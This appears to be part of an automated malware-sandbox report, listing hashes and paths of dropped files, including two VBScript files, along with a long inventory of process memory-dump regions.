a089221a2fdec4db86944792d9536b662327165d9cbcf52015814c4a009775da014c127b873a962cbfd169c1f64e51d3a2cf9291174d3b478fa4b2308004aefd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
d3f7387fc501a91d96ceec60369df032

SHA1
bdcca9fe0e42dbd62a1597aa6d42b67ce88ae545

SHA256
7df0cd988748aec207f0c7c6360b91984e6e33cc2a3bb431d0416227866df4c4

SHA512
a089221a2fdec4db86944792d9536b662327165d9cbcf52015814c4a009775da014c127b873a962cbfd169c1f64e51d3a2cf9291174d3b478fa4b2308004aefd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
d3f7387fc501a91d96ceec60369df032

SHA1
bdcca9fe0e42dbd62a1597aa6d42b67ce88ae545

SHA256
7df0cd988748aec207f0c7c6360b91984e6e33cc2a3bb431d0416227866df4c4

SHA512
a089221a2fdec4db86944792d9536b662327165d9cbcf52015814c4a009775da014c127b873a962cbfd169c1f64e51d3a2cf9291174d3b478fa4b2308004aefd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
d3f7387fc501a91d96ceec60369df032

SHA1
bdcca9fe0e42dbd62a1597aa6d42b67ce88ae545

SHA256
7df0cd988748aec207f0c7c6360b91984e6e33cc2a3bb431d0416227866df4c4

SHA512
a089221a2fdec4db86944792d9536b662327165d9cbcf52015814c4a009775da014c127b873a962cbfd169c1f64e51d3a2cf9291174d3b478fa4b2308004aefd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
d3f7387fc501a91d96ceec60369df032

SHA1
bdcca9fe0e42dbd62a1597aa6d42b67ce88ae545

SHA256
7df0cd988748aec207f0c7c6360b91984e6e33cc2a3bb431d0416227866df4c4

SHA512
a089221a2fdec4db86944792d9536b662327165d9cbcf52015814c4a009775da014c127b873a962cbfd169c1f64e51d3a2cf9291174d3b478fa4b2308004aefd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
d3f7387fc501a91d96ceec60369df032

SHA1
bdcca9fe0e42dbd62a1597aa6d42b67ce88ae545

SHA256
7df0cd988748aec207f0c7c6360b91984e6e33cc2a3bb431d0416227866df4c4

SHA512
a089221a2fdec4db86944792d9536b662327165d9cbcf52015814c4a009775da014c127b873a962cbfd169c1f64e51d3a2cf9291174d3b478fa4b2308004aefd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
6765d06d19fc2e01868dee87a20ca073

SHA1
d0e78da586314bea2767dd2f5a2da5331d42d05e

SHA256
1dff6b248e3f75f6ef45df98a9f334cae9fffc45d8e01e069f69ed019f4012ba

SHA512
43c821c074a660b7f780beb0b466c2f2c79a0775e52fb6d06c0192ac01c44365de4f7304d7e41e8acf8b9a16e7d7d2789db86851ad318d5c90abae6e3334946a

Download Submit
C:\Users\Public\SiggiaW.vbs
MD5
552bd91430a1338b61b48ebbe2e6777f

SHA1
00fc1370a965a49522ca47ceb607f20434453c85

SHA256
c3d618fc10777dc03a98f892ca3a49e2eda96bb72a9392007e1be7257aaa96ad

SHA512
0f27f7629c21fde76679a8a7492d846a7affcb9ed5efb7f7765488069b9e93b4e0cc45e3f79ed481aa923176ceea2fd04d9eb8e820c355de607a678e61254b39

Download Submit
C:\Users\Public\bin.vbs
MD5
9b7d7275f08bdc79397f5a25f5be8e23

SHA1
d933fd01e7061d38143f356688cb979961e814ed

SHA256
cfbb249ca33f5df6b203db24b51a9f34241603440478c146efc19ff317b0a480

SHA512
75ce7fa20fdeaa4cb0d775c2581b890ac929c6c57cd2457e99a2257e3a0d566571022f76959f6960bfbed6addb116eca91157b40c653a65f538d2d76fdaf9ae2

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1056-12-0x0000000000000000-mapping.dmp

Download
memory/1152-117-0x000007FEF5B00000-0x000007FEF64EC000-memory.dmp

Filesize
9.9MB

Download
memory/1152-122-0x000000001AB74000-0x000000001AB76000-memory.dmp

Filesize
8KB

Download
memory/1152-120-0x000000001AB70000-0x000000001AB72000-memory.dmp

Filesize
8KB

Download
memory/1172-5-0x0000000000000000-mapping.dmp

Download
memory/1172-6-0x000007FEFC5A1000-0x000007FEFC5A3000-memory.dmp

Filesize
8KB

Download
memory/1324-50-0x00000000047D0000-0x00000000047D1000-memory.dmp

Filesize
4KB

Download
memory/1324-94-0x0000000002520000-0x0000000002521000-memory.dmp

Filesize
4KB

Download
memory/1324-21-0x0000000000000000-mapping.dmp

Download
memory/1324-30-0x0000000069DC0000-0x000000006A4AE000-memory.dmp

Filesize
6.9MB

Download
memory/1324-123-0x0000000005300000-0x0000000005301000-memory.dmp

Filesize
4KB

Download
memory/1324-54-0x00000000047D2000-0x00000000047D3000-memory.dmp

Filesize
4KB

Download
memory/1324-51-0x0000000004810000-0x0000000004811000-memory.dmp

Filesize
4KB

Download
memory/1384-13-0x000007FEF7F80000-0x000007FEF81FA000-memory.dmp

Filesize
2.5MB

Download
memory/1540-14-0x0000000000000000-mapping.dmp

Download
memory/1596-18-0x00000000757E1000-0x00000000757E3000-memory.dmp

Filesize
8KB

Download
memory/1596-17-0x0000000000000000-mapping.dmp

Download
memory/1672-8-0x0000000000000000-mapping.dmp

Download
memory/1672-9-0x000000006AE11000-0x000000006AE14000-memory.dmp

Filesize
12KB

Download
memory/1692-42-0x0000000002360000-0x0000000002361000-memory.dmp

Filesize
4KB

Download
memory/1692-20-0x0000000000000000-mapping.dmp

Download
memory/1692-31-0x0000000069DC0000-0x000000006A4AE000-memory.dmp

Filesize
6.9MB

Download
memory/1692-49-0x0000000004850000-0x0000000004851000-memory.dmp

Filesize
4KB

Download
memory/1752-24-0x0000000000000000-mapping.dmp

Download
memory/1764-7-0x0000000000710000-0x0000000000711000-memory.dmp

Filesize
4KB

Download
memory/1764-4-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1764-2-0x0000000074B71000-0x0000000074B75000-memory.dmp

Filesize
16KB

Download
memory/1764-3-0x0000000071CB1000-0x0000000071CB3000-memory.dmp

Filesize
8KB

Download
memory/1764-16-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1892-34-0x00000000027A0000-0x00000000027A4000-memory.dmp

Filesize
16KB

Download
memory/1892-23-0x0000000000000000-mapping.dmp

Download
memory/1916-15-0x0000000000000000-mapping.dmp

Download
memory/1960-22-0x0000000000000000-mapping.dmp

Download
memory/1968-19-0x0000000000000000-mapping.dmp

Download
memory/2064-106-0x000000001ACD0000-0x000000001ACD2000-memory.dmp

Filesize
8KB

Download
memory/2064-110-0x000000001ACD4000-0x000000001ACD6000-memory.dmp

Filesize
8KB

Download
memory/2064-103-0x000007FEF5B00000-0x000007FEF64EC000-memory.dmp

Filesize
9.9MB

Download
memory/2296-138-0x0000000002964000-0x0000000002966000-memory.dmp

Filesize
8KB

Download
memory/2296-134-0x000007FEF5B00000-0x000007FEF64EC000-memory.dmp

Filesize
9.9MB

Download
memory/2296-137-0x0000000002960000-0x0000000002962000-memory.dmp

Filesize
8KB

Download
memory/2340-38-0x0000000002640000-0x0000000002644000-memory.dmp

Filesize
16KB

Download
memory/2340-33-0x0000000000000000-mapping.dmp

Download
memory/2384-148-0x000000001AB94000-0x000000001AB96000-memory.dmp

Filesize
8KB

Download
memory/2384-144-0x000007FEF5B00000-0x000007FEF64EC000-memory.dmp

Filesize
9.9MB

Download
memory/2384-146-0x000000001AB90000-0x000000001AB92000-memory.dmp

Filesize
8KB

Download
memory/2396-157-0x00000000027E0000-0x00000000027E4000-memory.dmp

Filesize
16KB

Download
memory/2396-37-0x0000000000000000-mapping.dmp

Download
memory/2452-126-0x0000000002740000-0x0000000002741000-memory.dmp

Filesize
4KB

Download
memory/2452-129-0x0000000002800000-0x0000000002801000-memory.dmp

Filesize
4KB

Download
memory/2452-46-0x000007FEF5B00000-0x000007FEF64EC000-memory.dmp

Filesize
9.9MB

Download
memory/2452-78-0x000000001AB00000-0x000000001AB02000-memory.dmp

Filesize
8KB

Download
memory/2452-87-0x000000001AB04000-0x000000001AB06000-memory.dmp

Filesize
8KB

Download
memory/2476-75-0x000000001A974000-0x000000001A976000-memory.dmp

Filesize
8KB

Download
memory/2476-81-0x0000000001E30000-0x0000000001E31000-memory.dmp

Filesize
4KB

Download
memory/2476-47-0x000007FEF5B00000-0x000007FEF64EC000-memory.dmp

Filesize
9.9MB

Download
memory/2476-68-0x000000001A970000-0x000000001A972000-memory.dmp

Filesize
8KB

Download
memory/2476-69-0x000000001AB70000-0x000000001AB71000-memory.dmp

Filesize
4KB

Download
memory/2476-63-0x0000000002340000-0x0000000002341000-memory.dmp

Filesize
4KB

Download
memory/2500-57-0x000007FEF5B00000-0x000007FEF64EC000-memory.dmp

Filesize
9.9MB

Download
memory/2500-80-0x0000000002970000-0x0000000002972000-memory.dmp

Filesize
8KB

Download
memory/2500-91-0x0000000002974000-0x0000000002976000-memory.dmp

Filesize
8KB

Download
memory/2620-158-0x000000001AD30000-0x000000001AD32000-memory.dmp

Filesize
8KB

Download
memory/2620-154-0x000007FEF5B00000-0x000007FEF64EC000-memory.dmp

Filesize
9.9MB

Download
memory/2620-159-0x000000001AD34000-0x000000001AD36000-memory.dmp

Filesize
8KB

Download
memory/2628-86-0x000000001ACC0000-0x000000001ACC2000-memory.dmp

Filesize
8KB

Download
memory/2628-60-0x000007FEF5B00000-0x000007FEF64EC000-memory.dmp

Filesize
9.9MB

Download
memory/2628-92-0x000000001ACC4000-0x000000001ACC6000-memory.dmp

Filesize
8KB

Download
memory/2692-107-0x0000000002680000-0x0000000002681000-memory.dmp

Filesize
4KB

Download
memory/2692-79-0x000000001AAC0000-0x000000001AAC2000-memory.dmp

Filesize
8KB

Download
memory/2692-61-0x000007FEF5B00000-0x000007FEF64EC000-memory.dmp

Filesize
9.9MB

Download
memory/2692-88-0x000000001AAC4000-0x000000001AAC6000-memory.dmp

Filesize
8KB

Download
memory/2760-77-0x000000001AA24000-0x000000001AA26000-memory.dmp

Filesize
8KB

Download
memory/2760-62-0x000007FEF5B00000-0x000007FEF64EC000-memory.dmp

Filesize
9.9MB

Download
memory/2760-90-0x000000001AA20000-0x000000001AA22000-memory.dmp

Filesize
8KB

Download
memory/2916-99-0x000000001ABF4000-0x000000001ABF6000-memory.dmp

Filesize
8KB

Download
memory/2916-98-0x000000001ABF0000-0x000000001ABF2000-memory.dmp

Filesize
8KB

Download
memory/2916-95-0x000007FEF5B00000-0x000007FEF64EC000-memory.dmp

Filesize
9.9MB

Download